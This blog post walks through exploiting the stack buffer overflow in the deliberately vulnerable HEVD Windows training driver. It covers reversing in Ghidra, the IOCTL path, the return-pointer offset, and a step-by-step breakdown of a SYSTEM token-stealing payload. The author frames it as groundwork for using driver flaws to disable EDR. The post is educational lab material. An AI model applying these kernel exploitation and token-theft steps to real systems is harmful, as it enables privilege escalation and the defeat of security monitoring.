One ring (zero) to rule them all.

Part 1

May 24, 2020

Introduction

Endpoint Detection and Response (EDR) is starting to rear its head in more and more environments, constraining operators and making post-exploitation activities more difficult. Sure, there are tricks and techniques to avoid these defenses, but unless you’ve had experience with a product or have access to an agent, the chance of being detected grows significantly.

Rather than being forced to walk on eggshells, I want an approach that will allow me to take back control and operate without constraints once administrative access is obtained on a system. I essentially want a blanket approach to dealing with these technologies on an ongoing basis.

I believe the answer to this problem awaits in kernel land, where the core functionality of EDR technology is rooted. From what I’ve seen on the Twitters, I don’t think I’m the only person with this train of thought either. I expect that over the next year or two, we will see kernel land shenanigans become more mainstream and no longer just the Tactics, Techniques and Procedures (TTPs) of APTs and advanced red teams.

Just as advances in defending against malicious PowerShell have pushed operators to C#, I believe operators will naturally be pushed into kernel land to deal with EDR. I expect this is already being done, but it is not in the public space yet (unless I’ve missed it).

A good example of using ring 0 shenanigans for defense evasion has already been published in Batsec’s (https://twitter.com/_batsec_) Ghost in the Logs research, where he discusses universally evading Sysmon and ETW.

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

To start exploring a possible solution to the problem, I have some knowledge and skills to develop first.

In the hope of getting on the ring 0 train before it leaves the station, I’ve decided to spend the next couple of months delving into kernel land. Once I’m comfortable with my understanding, I’ll move into researching the abuse of driver vulnerabilities to execute code in kernel land, which can subsequently be used to bypass and/or disable the functionality of EDR and AV solutions. I’m also hoping to pick up a better understanding of C++, with which I’m a noob.

Plan of Attack

To get the ball rolling, I’ve decided that I’m going to work through each of the vulnerabilities that have been deliberately engineered into the HackSys Extreme Vulnerable Driver (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver). From the blogs I’ve seen written about this driver, it seems this path is well trodden by those giants whose shoulders many of us stand upon.

So what follows will be detailed blog posts of my journey through each of these vulnerabilities. I find huge learning benefits in “reporting” my steps during an exercise, as it forces me to justify my understanding rather than gloss over details.

While I did initially reference the HEVD source code when working through this exercise, I want to work through the remainder of the exercises without source code, relying instead on reverse engineering to locate vulnerabilities and craft exploits.

This blog post will cover HEVD’s buffer overflow vulnerability.

As always, thanks @woolfordphilip for reading over the blog and providing advice.

Given that this blog post is a bit of a read, I’ve broken it into sections so you can skip to the components you are most interested in.

Setup: A high level overview of the components you need to play along from home.
Reverse Engineering the Driver: The steps I followed to reverse engineer the driver with Ghidra to locate the vulnerability and establish a method of abuse.
Understanding the Shellcode: A breakdown of each instruction that makes up one of the payloads provided in the HEVD project.
Generating the Shellcode: A small section showing the generation of shellcode with a Metasploit tool.
Polishing the Exploit: Incorporation of the shellcode into the POC, to develop a working exploit.
SYSTEM Sh3llz!!1!!!!11!!!: Concluding section.

Setup

To repeat the exact steps I walk through, you will need the following:

Virtual Box
2 Windows 7 VMs (1 for debugging and 1 for a ̶v̶i̶c̶t̶i̶m̶ debuggee)
A system with Ghidra installed (I installed it on a Kali VM)
WinDBG installed on both (Really only need it on the Debugging machine, but it comes in handy sometimes on the debuggee)
The vulnerable driver: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
OSR’s tool to load and register the driver: http://www.osronline.com/article.cfm%5Earticle=157.htm
Visual Studio to develop exploit code in C++

I’m not going to provide a step-by-step guide to setting up the environment, as there are plenty of good resources available.

Reverse Engineering the Driver

Once the environment was setup, I kicked off by opening the driver (HEVD.sys) in Ghidra and selecting the option to auto analyze.

Much like portable executables, drivers also have ‘entry points’. This is where I began my analysis.

The assembly instructions of the driver’s entry point.

To start with, I took note of the IoCreateDevice and IoDeleteDevice functions and started renaming the variables based on their documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatedevice and https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iodeletedevice).

Decompiled driver entry point with renamed variables.

The next step I took was to establish what the offsets of the DriverObject variable represented. I started by reviewing Microsoft’s documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_driver_object), which has a clear definition of the _DRIVER_OBJECT structure but does not detail the offsets of its members. While you could probably calculate these offsets based on the size of each contained type, it is much easier to fire up WinDBG on one of the Windows 7 VMs and run the dt (display type) command, which details the structure and the offsets of its members.

dt function to display _DRIVER_OBJECT offsets.

The results of this command indicate that all of the offsets we are interested in must be elements of the MajorFunction Ptr32 array, except for the offset of 0x34, which is the DriverUnload member. The Microsoft documentation defines the MajorFunction array as:

A dispatch table consisting of an array of entry points for the driver's DispatchXxx routines. The array's index values are the IRP_MJ_XXX values representing each IRP major function code.

So this member is an array of pointers to dispatch routines (functions) that the driver uses to handle I/O Request Packets (IRPs). These IRPs, from a high level, can be thought of as requests sent from user land for the driver to act upon. I found that the following website describes both the structure of the _DRIVER_OBJECT type and the elements (IRP handlers) of the MajorFunction array:

https://www.aldeid.com/wiki/DRIVER_OBJECT

IRP_MJ_CREATE                   0x00
IRP_MJ_CREATE_NAMED_PIPE        0x01
IRP_MJ_CLOSE                    0x02
IRP_MJ_READ                     0x03
IRP_MJ_WRITE                    0x04
IRP_MJ_QUERY_INFORMATION        0x05
IRP_MJ_SET_INFORMATION          0x06
IRP_MJ_QUERY_EA                 0x07
IRP_MJ_SET_EA                   0x08
IRP_MJ_FLUSH_BUFFERS            0x09
IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
IRP_MJ_SET_VOLUME_INFORMATION   0x0b
IRP_MJ_DIRECTORY_CONTROL        0x0c
IRP_MJ_FILE_SYSTEM_CONTROL      0x0d
IRP_MJ_DEVICE_CONTROL           0x0e
IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f
IRP_MJ_SHUTDOWN                 0x10
IRP_MJ_LOCK_CONTROL             0x11
IRP_MJ_CLEANUP                  0x12
IRP_MJ_CREATE_MAILSLOT          0x13
IRP_MJ_QUERY_SECURITY           0x14
IRP_MJ_SET_SECURITY             0x15
IRP_MJ_POWER                    0x16
IRP_MJ_SYSTEM_CONTROL           0x17
IRP_MJ_DEVICE_CHANGE            0x18
IRP_MJ_QUERY_QUOTA              0x19
IRP_MJ_SET_QUOTA                0x1a
IRP_MJ_PNP                      0x1b
IRP_MJ_PNP_POWER                IRP_MJ_PNP
IRP_MJ_MAXIMUM_FUNCTION         0x1b

Performing some calculations we can derive the IRP handlers the driver is registering. In this case I used comments to label each of the handlers being registered by the driver. With these changes the disassembled code started to look much nicer.
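The calculation itself is simple enough to sketch in a few lines of C++. This is only an illustration, not the code used in the post: it assumes the 32-bit _DRIVER_OBJECT layout, where DriverUnload sits at 0x34 and the MajorFunction array of 4-byte pointers starts immediately after it at 0x38. The names IrpIndexFromOffset, kMajorFunctionBase and kSlotSize are made up for the example.

```cpp
#include <cassert>
#include <cstdint>

// Assumption: 32-bit _DRIVER_OBJECT, where the MajorFunction array begins
// at 0x38 (directly after DriverUnload at 0x34) and each slot is a Ptr32.
constexpr std::uint32_t kMajorFunctionBase = 0x38;
constexpr std::uint32_t kSlotSize = 4;
constexpr std::uint32_t kIrpMjMaximumFunction = 0x1b;

// Returns the IRP_MJ_* index that an offset into _DRIVER_OBJECT refers to,
// or -1 if the offset does not land on a slot of the MajorFunction array.
int IrpIndexFromOffset(std::uint32_t offset) {
    if (offset < kMajorFunctionBase) {
        return -1;  // a member before the array, e.g. DriverUnload at 0x34
    }
    const std::uint32_t delta = offset - kMajorFunctionBase;
    if (delta % kSlotSize != 0) {
        return -1;  // not aligned to a pointer slot
    }
    const std::uint32_t index = delta / kSlotSize;
    return index <= kIrpMjMaximumFunction ? static_cast<int>(index) : -1;
}
```

With these assumptions, IrpIndexFromOffset(0x70) gives 0x0e, which the table above lists as IRP_MJ_DEVICE_CONTROL, while 0x34 is rejected because it is the DriverUnload member rather than an array slot.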

Driver entry point with renamed variable and comments for labels.

The function registered for the IRP_MJ_DEVICE_CONTROL element is of interest to us. This is the function that will handle IO control codes (IOCTLs) sent from user land. From a high level, these can be thought of as messages sent from user land which may include input and output data buffers for the driver to read from, process and write results to.

Reading the strings used in the DbgPrintEx function, it is obvious which function we want to explore further. Looking at this function, it does not appear to use any dangerous functions. However, it seems to be calling another function after some form of validation.

Function that seems to be a wrapper for another function.

Analyzing the function being called after the validation, it appears the called function uses the memcpy function, without performing any further validation checks. This looks like the perfect candidate for a saved return pointer buffer overflow. After renaming variables used in this function and those that are passed as arguments, this assumption is further strengthened.

It appears the memcpy function is copying a number of bytes that is specified as one argument of the function. The source of the bytes to be copied is specified as another argument of the function. These bytes are then copied into a local buffer with a size of 2060 bytes.

If we can work out a way to control both of these inputs, we should be able to exploit this vulnerability.

Jumping back to the function that calls “BufferOverflow”, we can start to rename variables and make sense of the validation check.

The “CallBufferOverflow” function validates whether the value stored at an offset of 0x10 from param_2 is a valid pointer. If it is valid, the function calls BufferOverflow with the pointer as the first argument and the value at an offset of 0x8 from param_2 as the size_t argument.

Taking another step back, let’s have a second pass at making sense of the IRP_MJ_DEVICE_CONTROL function. We established in a previous step that the IRP_MJ_DEVICE_CONTROL function is a dispatch routine registered by the driver. The Microsoft documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nc-wdm-driver_dispatch) details the definition of dispatch routines. We can use this definition to rename the variables passed into the IRP_MJ_DEVICE_CONTROL function.

NTSTATUS DriverDispatch(
  _DEVICE_OBJECT *DeviceObject,
  _IRP *Irp
)

Renamed IRP_MJ_DEVICE_CONTROL arguments.

To work out what the iVar1 variable represents, we need to look at the type definition of the _IRP struct and what member is located at an offset of 0x60. The results of WinDBG’s display type function indicate that this offset is located in the Tail member of the _IRP struct.

Using WinDBG to display _IRP’s structure.

Running the display type function again, but this time passing it the -r flag (recursively dump subtype fields), we get a look at the Tail structure’s members as well.

Using WinDBG to display _IRP’s structure in addition to the structure of members.

At offset 0x60 is the member CurrentStackLocation. We can now rename the iVar1 variable to reflect this member.

The last piece of the puzzle for this function is to work out what value is stored at an offset of 0xc from CurrentStackLocation.

Microsoft’s documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_irp) states that CurrentStackLocation is of an IO_STACK_LOCATION type. The results of WinDBG’s display type function on this structure indicate that the value at an offset of 0xc from CurrentStackLocation is the IoControlCode member of IO_STACK_LOCATION’s Parameters member.

Results of WinDBG’s display type for IO_STACK_LOCATION.

This information is enough to make sense of the parts of the IRP_MJ_DEVICE_CONTROL function we are interested in. We can conclude that, if the HEVD driver receives an IRP with a control code of 0x222003, the CallBufferOverflow function gets called with the arguments Irp and CurrentStackLocation.
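As an aside, the control code is not an arbitrary number. Windows IOCTL values follow the layout of the CTL_CODE macro: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. The sketch below unpacks those fields; the IoctlFields struct and DecodeIoctl function are names invented for this illustration and are not part of any Windows header.

```cpp
#include <cassert>
#include <cstdint>

// The four fields packed into an I/O control code by the CTL_CODE macro.
struct IoctlFields {
    std::uint32_t device_type;  // bits 16-31
    std::uint32_t access;       // bits 14-15
    std::uint32_t function;     // bits 2-13
    std::uint32_t method;       // bits 0-1
};

// Splits a raw IOCTL value back into its CTL_CODE components.
IoctlFields DecodeIoctl(std::uint32_t code) {
    IoctlFields fields;
    fields.device_type = (code >> 16) & 0xFFFF;
    fields.access = (code >> 14) & 0x3;
    fields.function = (code >> 2) & 0xFFF;
    fields.method = code & 0x3;
    return fields;
}
```

Decoding 0x222003 this way yields a device type of 0x22 (FILE_DEVICE_UNKNOWN), a function number of 0x800, an access value of 0 (FILE_ANY_ACCESS) and a method of 3 (METHOD_NEITHER). METHOD_NEITHER is the transfer type where the I/O manager hands the driver the user land buffer pointer as-is, which is why the Type3InputBuffer member becomes relevant for this control code.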

Revisiting the CallBufferOverflow function, we can rename the arguments of the function in addition to establishing exactly what is being passed to the BufferOverflow function when it is called.

We can see that the first argument of BufferOverflow is a buffer pointer located at an offset of 0x10 from the CurrentStackLocation struct. Reviewing the output of the previous WinDBG display type results for the IO_STACK_LOCATION structure, we find that this offset must be the Type3InputBuffer member of the IO_STACK_LOCATION’s DeviceIoControl member.

Microsoft’s documentation states that Type3InputBuffer is the input buffer provided in a device control IRP. This looks good for us: we control the input buffer which is copied from in the BufferOverflow function.

The next step is to work out if the second argument to the BufferOverflow function is also controllable. To establish what the offset of 0x8 of the IO_STACK_LOCATION struct represents, we can revisit WinDBG’s display type results again. These results indicate that this offset represents the input buffer size for device control IRPs.

Excellent, we can control both of these values from user land. We have the information required to start creating a proof of concept exploit.

Developing an Exploit in C++

In comparison to the previous section, the exploit development will be more high level. I don’t have a whole lot of experience in C++, so buyer beware when reusing my code snippets. I’ve also deliberately used screenshots of the code rather than snippets, in an attempt to push anyone who follows into writing their own code.

Based on the results of the exploration conducted in the previous section, we know that we need to develop code which sends a malicious device control IRP. To exploit the vulnerable memcpy call, this IRP needs to contain a buffer large enough to overwrite the saved return pointer.

To achieve this I started by writing a C++ wrapper which obtains a handle to the HEVD driver and sends it a device control IRP with an IO control code of 0x222003 and contents which don’t trigger the exploit.

I didn’t want a huge main function so I wrote wrappers for the core components of the exploit.

Obtain Driver Handle

This function calls the Windows CreateFileA (https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) function to obtain a handle to the HEVD driver, which is then returned.

Allocate a Buffer

This function allocates a buffer of a specified length, populates it with ‘0x42’ bytes and returns a pointer to this buffer.

Send IOCTL

This function crafts a device control IRP and sends it to the driver to be processed.

Main

Combines the functions to interact with the driver.

Testing the Wrapper

To validate my understanding of the driver’s functionality and my POC code, I used WinDBG to set a break point on the CallBufferOverflow function before running my executable.

To establish the memory address where I needed to set the break point, I referenced the address of the assembly instruction that calls the CallBufferOverflow function in Ghidra. This instruction is located at the memory address 0x004440b5.

Memory address of the assembly instruction which calls CallBufferOverflow.

To account for ASLR, we have to calculate the difference between this memory address and the base of the HEVD.sys image, which is 0x400000.

Based on this calculation, we can expect that the call CallBufferOverflow assembly instruction will be located at an offset of 0x440b5, from the base of the HEVD driver in memory.

Using WinDBG’s list loaded modules function, we can establish where the HEVD driver has been loaded into memory on the debuggee VM and then calculate the expected location of the assembly instruction which calls CallBufferOverflow.
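The arithmetic behind this step can be written down as a tiny helper. This is a sketch rather than the post's code: the function names are invented, and the loaded base used in the note below (0x93c00000) is a made-up value standing in for whatever the list loaded modules output shows on your debuggee.

```cpp
#include <cassert>
#include <cstdint>

// Values taken from the Ghidra analysis described in the post.
constexpr std::uint32_t kGhidraImageBase = 0x00400000;
constexpr std::uint32_t kGhidraCallAddress = 0x004440b5;

// Distance of an address from the image base it was analysed with.
std::uint32_t OffsetFromImageBase(std::uint32_t address, std::uint32_t image_base) {
    return address - image_base;
}

// Translates an address seen in static analysis to where it should sit
// once the image is loaded at a different base.
std::uint32_t Rebase(std::uint32_t static_address,
                     std::uint32_t static_base,
                     std::uint32_t loaded_base) {
    return loaded_base + OffsetFromImageBase(static_address, static_base);
}
```

OffsetFromImageBase(kGhidraCallAddress, kGhidraImageBase) gives 0x440b5, matching the offset above. If the driver happened to be loaded at the hypothetical base 0x93c00000, Rebase would place the call instruction at 0x93c440b5, which is the address you would then unassemble to check before setting the break point.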

WinDbg’s unassemble instruction to verify calculation.

Using WinDbg’s unassemble function, we can verify that our calculation is correct before setting a break point.

Hitting the break point which validates calculations and functionality of the code.

Running the executable and hitting the break point verifies our calculations are correct and that our code is behaving as expected.

Triggering the Vulnerability

Next, we can move on to actually triggering the vulnerability. To do this, we simply need to increase the size of the buffer which is copied from, to a size which we expect to overwrite the saved return pointer that returns execution to the CallBufferOverflow function.

By adjusting the code, recompiling it and running the resulting executable, we can expect to cause a crash if we’ve successfully managed to trigger the vulnerability.

As expected, running the executable results in an access violation, verifying that we can indeed overwrite the saved return pointer with a value in our buffer.

Crash caused by saved return pointer buffer overflow.

Calculating EIP offset

After confirming that the vulnerability can be triggered, we next need to confirm and calculate which part of the buffer is actually overwriting the saved return pointer.

To establish what offset is responsible for the overwrite, I generated a cyclic pattern with Metasploit’s pattern_create.rb script to replace the previously used ‘0x42’s.

I also added a function to my code, to read a text file containing the cyclic pattern from disk and copy it into a specified buffer.

Function to populate a buffer with the contents of a file.

After updating my main function to make use of GetPayload, I rebuilt and ran the fresh executable, causing another crash.

Overwriting the saved return pointer with the cyclic pattern.

This crash was the result of an access violation while trying to execute the code at memory address 0x72433372. Metasploit’s pattern_offset.rb script was then used to calculate that the bytes of the buffer which overwrite the saved return pointer are located at an offset of 2080 bytes into the buffer.
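To make the offset calculation less of a black box, here is a rough C++ re-creation of the idea. It is not the Metasploit implementation, only a sketch that assumes the familiar "Aa0Aa1Aa2..." pattern layout (upper-case letter, lower-case letter, digit, with the digit cycling fastest). MakePattern and FindPatternOffset are names made up for this example.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Builds a cyclic pattern of the form "Aa0Aa1Aa2...Ab0Ab1...".
std::string MakePattern(std::size_t length) {
    std::string pattern;
    while (pattern.size() < length) {  // start the cycle again if it runs out
        for (char upper = 'A'; upper <= 'Z' && pattern.size() < length; ++upper) {
            for (char lower = 'a'; lower <= 'z' && pattern.size() < length; ++lower) {
                for (char digit = '0'; digit <= '9' && pattern.size() < length; ++digit) {
                    pattern += upper;
                    pattern += lower;
                    pattern += digit;
                }
            }
        }
    }
    pattern.resize(length);  // trim the final partial triple
    return pattern;
}

// Finds where a 32-bit value taken from EIP first appears in the pattern.
// x86 is little-endian, so the lowest byte of the value comes first in memory.
long FindPatternOffset(std::uint32_t eip, std::size_t pattern_length) {
    std::string needle;
    for (int i = 0; i < 4; ++i) {
        needle += static_cast<char>((eip >> (8 * i)) & 0xFF);
    }
    const std::size_t position = MakePattern(pattern_length).find(needle);
    return position == std::string::npos ? -1 : static_cast<long>(position);
}
```

The value 0x72433372 corresponds to the bytes "r3Cr" in memory order, and FindPatternOffset(0x72433372, 3000) locates them 2080 bytes into the pattern, which agrees with the offset reported above.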

To verify that the calculated offset is correct, I updated my main function to set the 4 bytes located at the offset with ‘0x2a’.

If the calculation is correct, we expect a memory access violation at 0x2a2a2a2a after compiling and running the fresh executable.
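The layout of this test buffer can be sketched as follows. This is an illustration and not the screenshot code: it assumes the 2080-byte offset found above and a 4-byte saved return pointer, and the helper names BuildTestBuffer and ReadDword are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kReturnPointerOffset = 2080;  // offset reported in the post
constexpr std::size_t kReturnPointerSize = 4;       // 32-bit saved return pointer

// Fills the buffer with a filler byte up to the offset, then places four
// marker bytes where the saved return pointer is expected to be overwritten.
std::vector<unsigned char> BuildTestBuffer(unsigned char filler, unsigned char marker) {
    std::vector<unsigned char> buffer(kReturnPointerOffset + kReturnPointerSize, filler);
    std::memset(buffer.data() + kReturnPointerOffset, marker, kReturnPointerSize);
    return buffer;
}

// Reads four bytes at the given offset as a 32-bit value, for checking the layout.
std::uint32_t ReadDword(const std::vector<unsigned char>& buffer, std::size_t offset) {
    std::uint32_t value = 0;
    std::memcpy(&value, buffer.data() + offset, sizeof(value));
    return value;
}
```

Calling BuildTestBuffer(0x42, 0x2a) produces a 2084-byte buffer, and ReadDword on it at offset 2080 returns 0x2a2a2a2a, the same value we expect to see in the access violation.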

Excellent! We’ve confirmed that we are able to control the value which overwrites the saved return pointer.

Understanding the Shellcode

Now that we can control the flow of execution, we need a payload to run once the driver’s execution flow is hijacked.

The HEVD GitHub repository includes a payload (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c) which will overwrite the token of our process with a token from a process running as SYSTEM. This elevates the privilege of our process from an unprivileged user to the context of the SYSTEM account.

Token stealing payload — https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c

Before we can convert this payload into shellcode, we need to understand exactly what it is doing, and what the offsets represent.

To get an understanding of the purpose of each referenced struct and what each represents, I frequently referenced sites which detail and describe kernel structures.

PUSHAD & XOR EAX, EAX

The first two instructions are simple. The PUSHAD instruction saves the state of the registers, and the XOR instruction which follows sets the EAX register to 0.

MOV EAX, FS:[EAX + KTHREAD_OFFSET]

The next instruction is a little more complicated. We can see that the instruction is copying the value pointed to by fs:[eax + KTHREAD_OFFSET] into the EAX register. ‘fs’ refers to a segment register which, in kernel mode on 32-bit versions of Windows, points to the Kernel Processor Control Region (KPCR). The KPCR contains information about the current processor.

Using WinDBG, we can analyze the offsets of the KPCR structure with the display type function. The results of this command indicate that the offset mentioned in the comment lies within the PrcbData member, which is a _KPRCB (Kernel Processor Control Block) structure.

Analyzing the _KPRCB structure with WinDBG, we find that the offset mentioned in the comments of the payload refers to the CurrentThread member, which is a pointer to a _KTHREAD structure.

So we can establish that this instruction is saving a pointer to the _KTHREAD structure which contains information about the current thread.

MOV EAX, [EAX + EPROCESS_OFFSET]

The next instruction is moving the value stored at the EPROCESS_OFFSET, which the comment suggests is a sub member of the _KTHREAD structure. Using WinDBG, we can unwind the members to establish what exactly is being referenced and what its offset is.

The _KTHREAD member ApcState is a _KAPC_STATE structure, which is used to track Asynchronous Procedure Calls (APCs) which have been queued to the thread when it attaches to another process.

Using WinDBG to display the members of the _KAPC_STATE structure, we can see that the member referenced in the comments, Process, is a _KPROCESS structure.

However, the comment in the payload references an _EPROCESS structure. Using WinDBG to display the structure definition of _EPROCESS, we see it contains a _KPROCESS member at offset 0x0.

So while the value of _KTHREAD.ApcState.Process references a _KPROCESS structure, it is also a reference for the _EPROCESS structure which contains _KPROCESS.
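The same relationship can be shown with a toy model in C++. The structs below are heavily simplified stand-ins invented for this illustration (the real _KPROCESS and _EPROCESS have many more members); the only property being modelled is that the embedded structure is the first member.

```cpp
#include <cassert>
#include <cstddef>

// Simplified stand-ins for the kernel types, for illustration only.
struct KProcessModel {
    int header;
};

struct EProcessModel {
    KProcessModel Pcb;      // first member, so it lives at offset 0x0
    int unique_process_id;
};

static_assert(offsetof(EProcessModel, Pcb) == 0, "Pcb must be the first member");

// Because Pcb sits at offset 0x0, a pointer to it is also a pointer to the
// structure that contains it.
EProcessModel* FromKProcess(KProcessModel* kprocess) {
    return reinterpret_cast<EProcessModel*>(kprocess);
}
```

Given an EProcessModel object, FromKProcess applied to the address of its Pcb member returns the address of the object itself, which mirrors why the pointer read from ApcState.Process can be used as an _EPROCESS pointer.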

This is important to know, because an _EPROCESS structure is what the kernel uses to represent a process. So from this information, we can establish that this instruction is actually used to obtain a pointer to the _EPROCESS structure which is the kernel’s representation of the current process.

MOV ECX, EAX

The next instruction is simple, it is just saving a pointer to the _EPROCESS structure which represents the current process.

MOV EDX, 0x4

This instruction is moving 0x4 into EDX, which the comment suggests is the PID of the System process. Using a PowerShell one-liner we can confirm this is the case.

The System process has a process id of 4.

This is actually consistent for all Windows 7 operating systems. The System process always has a process id of 4.

SearchSystemPID: MOV EAX, [EAX + FLINK_OFFSET]

The following instruction is the first instruction of the SearchSystemPID routine. This instruction is saving the value of a sub member of the current process’s _EPROCESS structure.

Unwinding the members of the _EPROCESS struct we find that the ActiveProcessLinks member is a _LIST_ENTRY struct, which is a doubly linked list.

The ActiveProcessLinks doubly linked list, contains pointers to the processes currently running on the system. The Flink member references the next process in the list’s ActiveProcessLinks member and the Blink member references the previous process in the list’s ActiveProcessLinks member.

We can establish that this instruction is saving a pointer to the ActiveProcessLinks structure of the next process in the list.

SearchSystemPID: SUB EAX, FLINK_OFFSET

This instruction is reasonably straightforward: it subtracts the offset of the ActiveProcessLinks member to obtain a pointer to the start of the _EPROCESS structure of which it is a member.

SearchSystemPID: CMP [EAX + PID_OFFSET], EDX

The next instruction is making a comparison between the value stored in EDX (The process id of the System process) and a member of the _EPROCESS structure.

Reviewing the structure of the _EPROCESS struct again, we can establish that this instruction is validating whether the current process referenced by EAX has a process id of 0x4, which would make it the System process.

SearchSystemPID: JNE SearchSystemPID

The final instruction of the routine returns code execution to the beginning of the routine if the _EPROCESS structure currently referenced by EAX does not represent the System process.

We can establish that the function of this routine is to continuously parse the _EPROCESS structures until the EAX register references the _EPROCESS structure of the System process.
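For anyone who finds the loop easier to follow in a higher level language, here is a user land model of the routine in C++. It is only a sketch: ProcessModel is a made-up stand-in for _EPROCESS with just the members the routine touches, the list is a simple ring without a separate list head, and unlike the shellcode it stops after one full lap instead of looping forever when the PID is absent.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

struct ListEntry {
    ListEntry* Flink;  // next entry
    ListEntry* Blink;  // previous entry
};

// Hypothetical, cut-down stand-in for _EPROCESS.
struct ProcessModel {
    std::uint32_t pid;
    ListEntry links;       // plays the role of ActiveProcessLinks
    std::uintptr_t token;
};

// Equivalent of SUB EAX, FLINK_OFFSET: step back from the embedded list
// entry to the start of the structure that contains it.
ProcessModel* ProcessFromLinks(ListEntry* entry) {
    return reinterpret_cast<ProcessModel*>(
        reinterpret_cast<unsigned char*>(entry) - offsetof(ProcessModel, links));
}

// Follows Flink pointers until a process with the wanted PID is found.
ProcessModel* FindProcessByPid(ProcessModel* start, std::uint32_t pid) {
    ProcessModel* current = start;
    do {
        current = ProcessFromLinks(current->links.Flink);  // MOV + SUB
        if (current->pid == pid) {                         // CMP / JNE
            return current;
        }
    } while (current != start);  // safety stop that the shellcode does not have
    return nullptr;
}

// Test helper: links an array of processes into a ring.
void LinkCircular(ProcessModel* processes, std::size_t count) {
    for (std::size_t i = 0; i < count; ++i) {
        processes[i].links.Flink = &processes[(i + 1) % count].links;
        processes[i].links.Blink = &processes[(i + count - 1) % count].links;
    }
}
```

After linking a few ProcessModel entries with LinkCircular, calling FindProcessByPid with any entry as the starting point and a PID of 4 walks the ring until it reaches the entry standing in for the System process.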

MOV EDX, [EAX + TOKEN_OFFSET]

This instruction is copying the value referenced at an offset of the System _EPROCESS structure into the EDX register.

To find the offset, we can reference the type definition of the _EPROCESS structure again.

The Token member of the _EPROCESS structure is a pointer to a _TOKEN structure which describes the security context of the process.

MOV [ECX + TOKEN_OFFSET], EDX

This instruction is copying the pointer for the System process’ _TOKEN structure (stored in EDX) over the top of the pointer which references the current process’ (referenced by the ECX register) _TOKEN structure.

POPAD

Another simple instruction, POPAD returns the registers to the state they were in before the payload’s token nabbing antics.

A Graceful Exit

While the registers are back to the state they were at before hijacking the flow of execution, we need to hand back execution to the driver in a manner which will not cause a crash.

To achieve this we need to replicate the assembly instructions of the calling function (CallBufferOverflow) of BufferOverflow, which we hijacked by overwriting the saved return pointer. We can find these instructions by referencing the results of Ghidra’s earlier analysis.

Assembly instructions of the CallBufferOverflow function.

We can see 4 assembly instructions that are executed after code execution is returned to CallBufferOverflow from the BufferOverflow function, before it returns execution to its calling function, IRP_MJ_DEVICE_CONTROL:

MOV int0 , EAX
MOV EAX, int0
POP EBP
RET 0x8

Based on the decompiled code of the BufferOverflow and CallBufferOverflow functions, we can see that BufferOverflow always returns a value of 0, which is then returned by the CallBufferOverflow function.

So we can actually simplify the outstanding instructions of the CallBufferOverflow function and still smoothly return execution to the driver:

XOR EAX, EAX
POP EBP
RET  8

Generating the Shellcode

Based on my understanding of the shellcode and the values of offsets obtained in the previous section’s exploration, I used Metasploit’s nasm_shell.rb script to generate the bytes which represent the assembly instructions required for the payload.

Shellcode generated with Metasploit’s nasm_shell.rb script.

Polishing the Exploit

To complete the exploit code, I added a char array containing my shellcode and removed the memset call I was using to set the overwrite portion of the buffer to ‘0x2a’ bytes. I replaced it with a memcpy call, which sets the overwrite portion of the buffer to the memory address of my shellcode.